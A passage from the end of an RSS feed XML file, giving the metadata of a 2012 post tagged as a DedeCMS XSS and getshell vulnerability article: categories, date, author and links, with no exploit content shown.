/&gt;</description><category>织梦漏洞</category><category>GETSHeLL</category><category>Dedecms漏洞</category><category>安全相关</category><category>XSS</category><pubDate>Tue, 14 Feb 2012 22:58:06 +0800</pubDate><author>Adoing</author><comments>http://www.uedbox.com/2012_02_14/4028/dedecms-xss-getshell-pass-to-kill.jsp#comments</comments><guid isPermaLink="false">http://www.uedbox.com/?p=4028</guid><dc:creator>Adoing</dc:creator><fs:srclink>http://www.uedbox.com/2012_02_14/4028/dedecms-xss-getshell-pass-to-kill.jsp</fs:srclink><fs:srcfeed>http://www.uedbox.com/feed</fs:srcfeed><fs:itemid>feedsky/uedbox/~8266863/607593907/6370047</fs:itemid></item></channel></rss>
